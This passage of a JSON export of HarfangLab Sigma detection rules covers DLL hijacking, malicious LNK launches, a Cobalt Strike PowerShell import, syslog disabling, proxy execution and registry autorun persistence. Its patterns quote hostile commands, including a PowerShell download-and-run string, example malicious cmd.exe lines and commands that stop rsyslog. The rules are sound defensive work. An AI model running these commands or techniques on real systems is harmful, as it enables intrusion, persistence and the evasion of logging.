"content": "title: Unsigned propsys.dll Loaded\nid: 8f83af2f-2ff6-4bcb-b0dd-db41b1a24ba7\ndescription: |\n Detects a suspicious unsigned DLL named 'propsys.dll' loaded by a process that could be a target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\propsys.dll'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_signed:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n filter_legitimate:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\System32\\propsys.dll'\n - '?:\\Windows\\SysWOW64\\propsys.dll'\n - '\\Device\\vmsmb\\VSMB-'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\propsys.dll'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\propsys.dll'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f83af2f-2ff6-4bcb-b0dd-db41b1a24ba7",
"rule_name": "Unsigned propsys.dll Loaded",
"rule_description": "Detects a suspicious unsigned DLL named 'propsys.dll' loaded by a process that could be a target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f9ece2a-eee2-46a8-a109-58ff00b4a416",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080602Z",
"creation_date": "2026-03-23T11:45:34.080604Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080609Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1550903546916311043",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_onedrive.yml",
"content": "title: DLL Hijacking via OneDrive\nid: 8f9ece2a-eee2-46a8-a109-58ff00b4a416\ndescription: |\n Detects potential Windows DLL Hijacking via OneDrive.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/SBousseaden/status/1550903546916311043\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'OneDrive.exe'\n ImageLoaded|endswith:\n - '\\cscapi.dll'\n - '\\edputil.dll'\n - '\\secur32.dll'\n - '\\version.dll'\n - '\\wininet.dll'\n - '\\wtsapi32.dll'\n - '\\userenv.dll'\n - '\\sspicli.dll'\n - '\\profapi.dll'\n - '\\iphlpapi.dll'\n - '\\dwmapi.dll'\n - '\\wer.dll'\n - '\\uiautomation.dll'\n - '\\xmllite.dll'\n - '\\winhttp.dll'\n - '\\urlmon.dll'\n - '\\credui.dll'\n - '\\ncrypt.dll'\n - '\\propsys.dll'\n - '\\rstrtmgr.dll'\n - '\\iertutil.dll'\n - '\\srvcli.dll'\n - '\\netutils.dll'\n - '\\mpr.dll'\n - '\\netapi32.dll'\n - '\\winmm.dll'\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\dnsapi.dll'\n - '\\ntasn1.dll'\n - '\\wscapi.dll'\n - '\\msans1.dll'\n - '\\winsta.dll'\n - '\\cldapi.dll'\n - '\\fltlib.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f9ece2a-eee2-46a8-a109-58ff00b4a416",
"rule_name": "DLL Hijacking via OneDrive",
"rule_description": "Detects potential Windows DLL Hijacking via OneDrive.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8fba9e6e-3fe4-45f3-bbec-1d4e0b2aca2c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607420Z",
"creation_date": "2026-03-23T11:45:34.607424Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607431Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-RaspberryRobin/ta-p/226488",
"https://attack.mitre.org/techniques/T1204/001/"
],
"name": "t1204_001_potential_process_related_lnk.yml",
"content": "title: Malicious Process Started linked to LNK File\nid: 8fba9e6e-3fe4-45f3-bbec-1d4e0b2aca2c\ndescription: |\n Detects the execution of a potential malicious process that can be the result of clicking a malicious link (LNK file).\n It is often the result of a spearphishing attack via disk image file (like ISO or IMG) or a lateralisation via USB worm like Raspberry Robin.\n Attackers may abuse LNK files to hide their malicious actions and make the file explorer display a folder with the specified name to the user.\n It is recommended to investigate the command-line as well as to correlate this alert with other commands executed around it to determine its legitimacy.\nreferences:\n - https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-RaspberryRobin/ta-p/226488\n - https://attack.mitre.org/techniques/T1204/001/\ndate: 2021/12/14\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # C:\\WINDOWS\\system32\\cmd.exe /c start Colis.vbs&start explorer REUNION&exit\n # C:\\Windows\\System32\\cmd.exe /C xcopy /HY a.cpl C:\\Users\\xxx\\AppData\\Local\\Temp&&start C:\\Users\\xxx\\AppData\\Local\\Temp\\a.cpl&start /D C:\\ /MAX explorer %CD%PLANNING\n ParentImage|endswith: '\\explorer.exe'\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\mshta.exe'\n - '\\rundll32.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\msiexec.exe'\n CommandLine: '*&*start *explorer*'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8fba9e6e-3fe4-45f3-bbec-1d4e0b2aca2c",
"rule_name": "Malicious Process Started linked to LNK File",
"rule_description": "Detects the execution of a potential malicious process that can be the result of clicking a malicious link (LNK file).\nIt is often the result of a spearphishing attack via disk image file (like ISO or IMG) or a lateralisation via USB worm like Raspberry Robin.\nAttackers may abuse LNK files to hide their malicious actions and make the file explorer display a folder with the specified name to the user.\nIt is recommended to investigate the command-line as well as to correlate this alert with other commands executed around it to determine its legitimacy.\n",
"rule_creation_date": "2021-12-14",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8feb7464-713b-43b9-abd3-c00e25ee4f2b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091560Z",
"creation_date": "2026-03-23T11:45:34.091562Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091566Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
"https://www.crowdstrike.com/en-us/blog/getting-the-bacon-from-cobalt-strike-beacon/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1059_001_cobalt_strike_powershell_import_module.yml",
"content": "title: Cobalt Strike Powershell-Import Module Detected\nid: 8feb7464-713b-43b9-abd3-c00e25ee4f2b\ndescription: |\n Detects a command from the \"Powershell-Import\" Cobalt Strike module that downloads another PowerShell script into the beacon's PowerShell session.\n The beacon creates an HTTP server that hosts the PowerShell module which is then loaded automatically when PowerShell commands get executed.\n It is recommended to investigate the PowerShell commands executed by the process in order to get the loaded PowerShell module content.\n It is also recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\n - https://www.crowdstrike.com/en-us/blog/getting-the-bacon-from-cobalt-strike-beacon/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0154/\ndate: 2025/01/10\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.s0154\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|startswith: 'IEX (New-Object Net.Webclient).DownloadString(*http://127.0.0.1:*);'\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8feb7464-713b-43b9-abd3-c00e25ee4f2b",
"rule_name": "Cobalt Strike Powershell-Import Module Detected",
"rule_description": "Detects a command from the \"Powershell-Import\" Cobalt Strike module that downloads another PowerShell script into the beacon's PowerShell session.\nThe beacon creates an HTTP server that hosts the PowerShell module which is then loaded automatically when PowerShell commands get executed.\nIt is recommended to investigate the PowerShell commands executed by the process in order to get the loaded PowerShell module content.\nIt is also recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2025-01-10",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ff98ac0-e971-4cd5-8393-79bb8a209cd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611894Z",
"creation_date": "2026-03-23T11:45:34.611898Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611905Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1489/"
],
"name": "t1562_001_disable_rsyslog.yml",
"content": "title: Syslog Disabled\nid: 8ff98ac0-e971-4cd5-8393-79bb8a209cd3\ndescription: |\n Detects when the rsyslog service is disabled.\n This service is used to forward log messages within the system.\n Threat actors can disable it to prevent log messages from being forwarded properly between applications.\n It is recommended to check the parent process for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1489/\ndate: 2021/09/22\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.impact\n - attack.t1489\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.ServiceStop\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_systemctl:\n Image|endswith: '/systemctl'\n CommandLine|contains:\n # Optional options can be placed anywhere in the command line (including in between)\n - ' stop *rsyslog'\n - ' disable *rsyslog'\n\n selection_systemd_manual:\n Image|endswith: '/rm'\n CommandLine|contains: '/etc/systemd/system/multi-user.target.wants/rsyslog.service'\n\n selection_initctl:\n Image|endswith: '/initctl'\n CommandLine:\n # Optional options can be placed anywhere in the command line (including in between)\n - '* stop *rsyslog*'\n - '* disable *rsyslog*'\n\n selection_sysvinit_manual:\n Image|endswith: '/rm'\n CommandLine|contains: '/etc/rc.d/init.d/rsyslog'\n\n selection_logrotate_rsyslog:\n # Could use the Ancestors field here to capture logrotate directly\n # but not doing so because this edit was done too close to the Rust\n # Linux Agent update and could break Python Agent rule.\n ParentImage: '/bin/sh /usr/lib/rsyslog/rsyslog-rotate'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ff98ac0-e971-4cd5-8393-79bb8a209cd3",
"rule_name": "Syslog Disabled",
"rule_description": "Detects when the rsyslog service is disabled.\nThis service is used to forward log messages within the system.\nThreat actors can disable it to prevent log messages from being forwarded properly between applications.\nIt is recommended to check the parent process for suspicious activities.\n",
"rule_creation_date": "2021-09-22",
"rule_modified_date": "2025-02-19",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "904d22a6-6fea-4a89-a827-448a7d0fbdc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088620Z",
"creation_date": "2026-03-23T11:45:34.088622Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088626Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md#atomic-test-13---lolbas-customshellhost-to-spawn-process",
"https://research.checkpoint.com/2025/stealth-falcon-zero-day/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1574/008/"
],
"name": "t1218_customshellhost_proxy_execution.yml",
"content": "title: Proxy Execution via CustomShellHost.exe\nid: 904d22a6-6fea-4a89-a827-448a7d0fbdc5\ndescription: |\n Detects the execution of a malicious explorer.exe process spawned by the legitimate CustomShellHost.exe binary.\n CustomShellHost.exe is a host process used by custom shells when using Windows in Kiosk mode. When executed without parameters, it will launch explorer.exe with the \"/NoShellRegistrationCheck\" argument if explorer.exe is present in the current working directory.\n Adversaries may bypass process and/or signature-based defenses by renaming a binary to \"explorer.exe\" to proxy execution of malicious content with signed, or otherwise trusted, binaries.\n It is recommended to investigate the explorer.exe file being run by CustomShellHost.exe, verify if CustomShellHost.exe should be running on the system (as it's unlikely to run on normal workstations), and examine potential malicious actions performed by the spawned explorer.exe process to determine if this activity was legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md#atomic-test-13---lolbas-customshellhost-to-spawn-process\n - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1574/008/\ndate: 2025/06/13\nmodified: 2025/06/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1574.008\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.CustomShellHost\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\customshellhost.exe'\n Image|endswith: '\\explorer.exe'\n\n filter_explorer:\n Image: '?:\\Windows\\explorer.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "904d22a6-6fea-4a89-a827-448a7d0fbdc5",
"rule_name": "Proxy Execution via CustomShellHost.exe",
"rule_description": "Detects the execution of a malicious explorer.exe process spawned by the legitimate CustomShellHost.exe binary.\nCustomShellHost.exe is a host process used by custom shells when using Windows in Kiosk mode. When executed without parameters, it will launch explorer.exe with the \"/NoShellRegistrationCheck\" argument if explorer.exe is present in the current working directory.\nAdversaries may bypass process and/or signature-based defenses by renaming a binary to \"explorer.exe\" to proxy execution of malicious content with signed, or otherwise trusted, binaries.\nIt is recommended to investigate the explorer.exe file being run by CustomShellHost.exe, verify if CustomShellHost.exe should be running on the system (as it's unlikely to run on normal workstations), and examine potential malicious actions performed by the spawned explorer.exe process to determine if this activity was legitimate.\n",
"rule_creation_date": "2025-06-13",
"rule_modified_date": "2025-06-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218",
"attack.t1574.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "907e5765-e7f7-4b8f-886c-749bf315fe52",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624677Z",
"creation_date": "2026-03-23T11:45:34.624679Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624683Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_persistence_registry_asep_remote.yml",
"content": "title: Registry Autorun Key Added from Remote Session\nid: 907e5765-e7f7-4b8f-886c-749bf315fe52\ndescription: |\n Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\n Autostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\n It is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\nreferences:\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2025/10/21\nmodified: 2025/12/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains:\n # run keys (run / runonce / runonceex / runservices / runservicesonce )\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n # covers RunOnce and RunOnce\\Setup\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n # covers RunOnceEx\\000x\\value and RunOnceEx\\000x\\Depend\\value\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunServices\\'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\\'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Run'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Run'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\BootExecute'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\BootExecuteNoPnpSync'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\SetupExecute'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\PlatformExecute'\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "907e5765-e7f7-4b8f-886c-749bf315fe52",
"rule_name": "Registry Autorun Key Added from Remote Session",
"rule_description": "Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\nAutostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\nIt is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\n",
"rule_creation_date": "2025-10-21",
"rule_modified_date": "2025-12-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "90925be7-7d69-42de-a7d3-1aaf59bddb05",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079717Z",
"creation_date": "2026-03-23T11:45:34.079719Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079723Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://i.blackhat.com/briefings/asia/2018/asia-18-Tal-Liberman-Documenting-the-Undocumented-The-Rise-and-Fall-of-AMSI.pdf"
],
"name": "t1562_001_disable_amsi_windows_script.yml",
